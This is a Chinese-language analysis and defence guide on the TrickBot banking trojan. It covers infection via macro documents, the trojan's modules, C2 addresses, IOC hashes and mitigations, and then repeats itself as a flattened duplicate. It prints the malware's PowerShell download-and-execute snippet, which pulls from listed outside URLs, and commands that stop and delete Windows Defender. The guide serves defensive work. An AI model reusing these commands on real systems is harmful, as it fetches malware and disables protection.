TrickBot银行木马分析与防御指南

一、背景概述

TrickBot是一款专门针对全球金融机构的银行木马，最初于2016年被发现，由黑客团伙用于攻击多个国家的银行系统。最新变种通过垃圾邮件传播，针对全球数百家大型银行网站进行攻击。

二、攻击流程分析

1. 初始感染阶段

传播方式：通过垃圾邮件携带恶意附件
文件类型：伪装成DOC文档（如Trickbot.doc）
恶意宏代码：文档中包含VBA宏代码，诱导用户启用宏

2. 载荷下载阶段

宏代码执行后会运行PowerShell脚本：

function [随机名]([string] $[随机名]){
    (new-object system.net.webclient).downloadfile($[随机名],'%temp%\[随机名].exe'); 
    start-process '%temp%\[随机名].exe';
}
try{
    [随机名]('http://whitakerfamily.info/ico.ico')
}catch{
    [随机名]('http://rayanat.com/ico.ico')
}

从备用URL下载TrickBot恶意程序
保存到临时目录并执行

3. 恶意程序执行流程

资源解密：
- 读取资源ID为"BBVCXZIIUHGSWQ"的加密数据
- 使用内置密钥1和密钥2进行解密
- 通过CryptEncrypt API进行最终解密
内存加载：
- 解密后的Payload是DLL文件
- 直接在内存中加载，不落地
- 入口函数为shellcode_main
持久化机制：
- 关闭Windows Defender服务：
```
sc stop WinDefend
sc delete WinDefend
```
- 创建计划任务实现自启动
- 复制自身到%appdata%\msscsc\TsickCot.exe
进程注入：
- 注入多个SVCHOST.EXE进程
- 每个进程执行不同功能模块

三、功能模块分析

1. systeminfo32/64模块

收集系统信息：
- 操作系统版本
- CPU信息
- 内存大小
- 已安装软件列表（通过注册表遍历）
- 系统服务信息
- 进程列表

2. injectDll32/64模块

浏览器进程检测与注入：
- 监控浏览器进程通信
- 根据配置文件进行过滤
- 注入恶意代码并Hook关键函数

3. 其他模块

networkDll32：网络通信模块
mailsearcher32：邮件搜索模块
importDll32：数据导入模块

四、攻击目标

从配置文件中提取的银行列表显示，TrickBot针对全球数百家银行机构，包括但不限于：

欧洲多家主要银行
北美大型金融机构
亚洲重要银行系统

五、网络通信分析

C2服务器地址

94.103.81.144:447
82.202.221.78:443 
90.69.224.122:443
82.202.221.163:447
185.13.39.197:443
109.234.39.42:447
188.124.167.132:8082
193.151.99.8:8082
162.249.229.101:8082
200.46.129.90:8082
70.79.178.120:8082
195.54.163.184:443

下载域名

whitakerfamily.info (77.72.1.66)
rayanat.com (104.244.127.60)
http://37.230.116.249/response.php

通信特征

上传数据经过加密处理（算法未知）
使用HTTPS和自定义端口进行通信
模块化下载架构

六、防御措施

1. 预防措施

禁用Office宏功能，或设置为"禁用所有宏，并发出通知"
启用附件沙箱检测
实施电子邮件过滤策略，拦截可疑附件

2. 系统加固

及时安装系统补丁，修复高危漏洞
关闭不必要的端口：445, 135, 139, 3389等
使用强密码策略，特别是RDP连接
限制PowerShell执行权限

3. 检测与响应

部署EDR解决方案，监控异常行为：
- 异常的SVCHOST.EXE进程
- 可疑的内存加载行为
- 异常的PowerShell执行
监控以下目录的异常文件创建：
- %temp%\
- %appdata%\msscsc\
检测Windows Defender服务异常停止

4. 应急响应

隔离受感染主机
检查以下项目：
- 计划任务中的可疑条目
- %appdata%\msscsc\目录下的TsickCot.exe
- 异常的SVCHOST.EXE进程
收集以下信息进行取证：
- 内存转储
- 磁盘上的可疑文件
- 网络连接日志
重置所有可能泄露的凭证

七、IOC（入侵指标）

文件哈希

A8CD87036ECDDFBA234E3796D93FE667 ico.ico
5DFEA92F65755CF314180DB40596B9FE injectDll32
A652BAD6746C739CC8E69B077E6ED396 injectDll64
B3A9D059584418A2A0803FB0C6753EA9 systeminfo32
5D4512296AA66BFC0F2AE610556D84F2 systeminfo64
30562B6FE4D8EFDCE3783CDD0909FFE6 networkDll32
F877C696C4082654FE64E135966FFCC6 mailsearcher32
3C0A14D3E4E5F1968434ECB017A4689B importDll32

网络IOC

参见第五部分列出的C2服务器地址和域名

八、关联威胁

近期活跃的其他银行木马家族：

ZeusPandaBanker
Gozi
Pegasus
Ratopak
Ursnif

这些家族同样针对全球银行系统，更新频繁，需要保持警惕。

TrickBot银行木马分析与防御指南一、背景概述 TrickBot是一款专门针对全球金融机构的银行木马，最初于2016年被发现，由黑客团伙用于攻击多个国家的银行系统。最新变种通过垃圾邮件传播，针对全球数百家大型银行网站进行攻击。二、攻击流程分析 1. 初始感染阶段传播方式：通过垃圾邮件携带恶意附件文件类型：伪装成DOC文档（如Trickbot.doc）恶意宏代码：文档中包含VBA宏代码，诱导用户启用宏 2. 载荷下载阶段宏代码执行后会运行PowerShell脚本：从备用URL下载TrickBot恶意程序保存到临时目录并执行 3. 恶意程序执行流程资源解密：读取资源ID为"BBVCXZIIUHGSWQ"的加密数据使用内置密钥1和密钥2进行解密通过CryptEncrypt API进行最终解密内存加载：解密后的Payload是DLL文件直接在内存中加载，不落地入口函数为shellcode_ main 持久化机制：关闭Windows Defender服务：创建计划任务实现自启动复制自身到%appdata%\msscsc\TsickCot.exe 进程注入：注入多个SVCHOST.EXE进程每个进程执行不同功能模块三、功能模块分析 1. systeminfo32/64模块收集系统信息：操作系统版本 CPU信息内存大小已安装软件列表（通过注册表遍历）系统服务信息进程列表 2. injectDll32/64模块浏览器进程检测与注入：监控浏览器进程通信根据配置文件进行过滤注入恶意代码并Hook关键函数 3. 其他模块 networkDll32：网络通信模块 mailsearcher32：邮件搜索模块 importDll32：数据导入模块四、攻击目标从配置文件中提取的银行列表显示，TrickBot针对全球数百家银行机构，包括但不限于：欧洲多家主要银行北美大型金融机构亚洲重要银行系统五、网络通信分析 C2服务器地址下载域名通信特征上传数据经过加密处理（算法未知）使用HTTPS和自定义端口进行通信模块化下载架构六、防御措施 1. 预防措施禁用Office宏功能，或设置为"禁用所有宏，并发出通知" 启用附件沙箱检测实施电子邮件过滤策略，拦截可疑附件 2. 系统加固及时安装系统补丁，修复高危漏洞关闭不必要的端口：445, 135, 139, 3389等使用强密码策略，特别是RDP连接限制PowerShell执行权限 3. 检测与响应部署EDR解决方案，监控异常行为：异常的SVCHOST.EXE进程可疑的内存加载行为异常的PowerShell执行监控以下目录的异常文件创建： %temp%\ %appdata%\msscsc\ 检测Windows Defender服务异常停止 4. 应急响应隔离受感染主机检查以下项目：计划任务中的可疑条目 %appdata%\msscsc\目录下的TsickCot.exe 异常的SVCHOST.EXE进程收集以下信息进行取证：内存转储磁盘上的可疑文件网络连接日志重置所有可能泄露的凭证七、IOC（入侵指标）文件哈希网络IOC 参见第五部分列出的C2服务器地址和域名八、关联威胁近期活跃的其他银行木马家族： ZeusPandaBanker Gozi Pegasus Ratopak Ursnif 这些家族同样针对全球银行系统，更新频繁，需要保持警惕。